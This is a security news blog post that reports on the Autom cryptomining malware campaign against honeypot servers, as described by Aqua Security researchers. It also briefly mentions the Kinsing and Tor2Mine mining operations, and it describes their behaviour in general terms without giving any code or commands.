Search This Blog

Powered by Blogger.

Blog Archive

Labels

Autom Cryptomining Malware Employs Upgraded Evasion Techniques

The malware has targeted 84 honeypot servers since 2019.

 

The malicious Autom crypto mining campaign has upgraded its weapons while adding new defense evasion methods that allow attackers to fly under the radar of anti-virus scanning tools. 

According to researchers at DevSecOps and cloud security firm AquaSecurity, the malicious campaign was first identified in 2019, and since then a total of 84 attacks against researchers’ honeypot servers have been reported, four of these occurring in 2021.

Preliminary attacks of this campaign involved implementing a malicious command, once a user runs a vanilla image with the name "alpine:latest.” That action resulted in a shell script named "autom.sh." being downloaded on the device. 

"Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official images and allow their use," the researchers explained in a blog post. "Over the years, the malicious command that was added to the official image to carry out the attack has barely changed. The main difference is the server from which the shell script autom.sh was downloaded."

The shell script initiates the attack sequence, allowing the attackers to create a new user account beneath the title "akay". Then, the account’s privileges are upgraded to a root user, enabling malicious actors to run arbitrary commands on the compromised machine and, eventually, abuse the available resources to mine crypto-currency. In the early stages of the 2019 campaign, there were no special methods to hide the mining activity, but the later versions depict the extreme measures its developers have taken to keep it hidden from scanning tools. 

The malicious campaigns carried out to hijack computers to mine cryptocurrencies have been dominated by several threat actors such as Kinsing, which has been spotted scanning the internet for misconfigured Docker servers to invade the unguarded hosts and install a previously undocumented coin miner strain. 

"Miners are a low-risk way for cybercriminals to turn a vulnerability into digital cash, with the greatest risk to their cash flow being competing miners discovering the same vulnerable servers," Sophos senior threat researcher Sean Gallagher explained in an analysis of a Tor2Mine mining campaign, which involves the use of a PowerShell script to disable malware protection, execute a miner payload, and harvest Windows credentials.
Share it:

cryptomining

Evasive Techniques

Malicious Campaign

malware